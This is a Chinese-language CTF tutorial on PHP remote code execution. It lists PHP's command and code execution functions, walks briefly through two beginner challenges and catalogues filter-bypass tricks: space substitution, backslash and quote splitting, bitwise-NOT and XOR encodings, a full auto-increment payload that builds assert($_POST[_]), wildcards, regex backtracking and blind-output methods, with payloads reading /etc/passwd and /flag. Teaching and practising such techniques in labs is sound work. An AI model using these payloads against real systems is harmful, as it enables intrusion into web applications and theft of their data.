1，What is RCE？

        在CTF（Capture The Flag）竞赛中，RCE漏洞指的是远程代码执行漏洞（Remote Code Execution）。这类漏洞允许攻击者通过某种方式在目标系统上执行任意代码，从而完全控制目标系统或获取敏感信息。RCE漏洞通常是非常严重的漏洞，因为它们可以直接导致系统被攻陷。

2，How to find a RCE？

        要能执行漏洞，那就肯定要了解能执行漏洞的函数

1.系统命令执行函数

• system()：能将字符串作为OS命令执行，且返回命令执行结果；
• exec()：能将字符串作为OS命令执行，但是只返回执行结果的最后一行(约等于无回显)；
• shell_exec()：能将字符串作为OS命令执行
• passthru()：能将字符串作为OS命令执行，只调用命令不返回任何结果，但把命令的运行结果原样输出到标准输出设备上；
• popen()：打开进程文件指针
• proc_open()：与popen()类似
• pcntl_exec()：在当前进程空间执行指定程序；
• 反引号``：反引号``内的字符串会被解析为OS命令；

2.代码执行函数

• eval()：将字符串作为php代码执行；
• assert()：将字符串作为php代码执行；
• preg_replace()：正则匹配替换字符串；
• create_function()：主要创建匿名函数；
• call_user_func()：回调函数，第一个参数为函数名，第二个参数为函数的参数；
• call_user_func_array()：回调函数，第一个参数为函数名，第二个参数为函数参数的数组；
• 可变函数：若变量后有括号，该变量会被当做函数名为变量值(前提是该变量值是存在的函数名)的函数执行；

 For example

[SWPUCTF 2021 新生赛]babyrce

从php代码可以知道要让admin的cookie等于1 

 

然后尝试访问这个php文件

 一个典型的rce注入，过滤了空格，可以用$IFS$6绕过

然后我们就可以进行命令执行，在根目录下找到了flag

 这样一道简单的RCE就做完了（我说白了，我白说了，这才像新生题）

这样也可以看出来，RCE就是靶机上会给出命令执行函数（一般情况下），再加上一些过滤就构成了一般的RCE（二般的我不敢说话）

3，RCE by pass

由此可见RCE的绕过方式相当重要，那我问你，你学不学

1，逻辑运算符

由于php是在c语言上衍生的一门编程语言，所以逻辑运算符是与c差不多的

逻辑运算符	例子	描述
&	A&B	执行A和B
&&	A&&B	当A为真时执行B
；	A;B	从左到右执行AB
|	A|B	显示B的执行结果
||	A||B	当A为假时执行B

以pikachu靶场为例(因为靶机时windows系统，所以用dir查看命令

 （| 只显示后一个命令的执行）

（&两个都执行 ）

2，空格绕过

        这里有如下几种方式

• $IFS$6,${IFS}
• <        重新定向符 例子 cat</etc/passwd
• \t，%09（水平制表符）
• %20，\x20 url解码和16进制中的空格

例题 [MoeCTF 2021]babyRCE

可以看到过滤了空格和一些系统命令，这里的空格只有用第一中方式

然后cat等命令用下面要将的反斜杠绕过

3，反斜杠\绕过 

如上题所示，当面对一些系统命令被过滤掉，而反斜杠没有被过滤，就可以用这钟绕过

如 cat-->c\at flag-->fl\ag

4,取反绕过

什么是去取反？

        php语言中"~$a"会将变量a的值取反将字符或字符串进行按位取反，从而生成新的字符或字符串。(比如0101 --> 1010)

        而利用方法就是先取反，在取回来就行了（适用于~没有被过滤）

所以就可以用

?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

 作为传递的参数

5,异或绕过

 我们都知道异或运算符^

而效果就是 1001^0111=1110        即对应位相同为0，不同为1，而且这个运算是可逆的

所以我们可以通过用异或运算的方法来绕过

比如 a='system'^'whatcanisay'

那我们要得到system就要传入a^'whatcanisay'就行了

6，自增绕过

这个相当有趣

比如我们令$_=[],这样就会得到一个名为_的空数组

而在php中，创建数组用Array

那我们输出echo "$_"会怎么样

这样就从无字符到有字符了，再用$_="$_",配合上@==&返回0,所以就能访问到A

再将A赋值给$_,并自增

 

现在发现$_变成了B（ASCII值＋1）

原理懂了我们直接看payload

//自增payload，assert($_POST[_]),命令传入_
 
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);&_=phpinfo();

这不就稳稳拿下了吗 

7，变量拼接

有些时候我们也可以自己命名一个变量

比如变量cmd中会正则匹配flag字符串

那我们就可以传入?a=flag&cmd=cat $a

同时也可以字符串拼接，比如s.y.s.t.e.m

8,base和hex编码绕过

        之前学的管道符|就发挥作用了，比如我我们将system用base64编码，传入后再用base64解码不久可以了吗？

 

 总之，这两种方法的思想无异于就是先转为16进制或者base再转回来

9，正则匹配绕过

//如flag被过滤
cat /f???
cat /fl*
cat /f[a-z]{3}

这三种都是shell通配符

 

 10，引号绕过

//如cat、ls被过滤
ca""t /flag
l's' /

感觉与反斜杠绕过同理，就是将关键词分隔开

11，命令替换

如果cat被过滤了还可以用如下的东西替代

 

12，回溯绕过

适用于php正则匹配绕过

//php正则的回溯次数大于1000000次时返回False
$a = 'hello world'+'h'*1000000
preg_match("/hello.*world/is",$a) == False

13，无回显RCE

//无回显RCE，如exce()函数，可将执行结果输出到文件再访问文件执行以下命令后访问1.txt即可
ls / | tee 1.txt
cat /flag | tee 2.txt
//eval()无输出
eval(print`c\at /flag`;)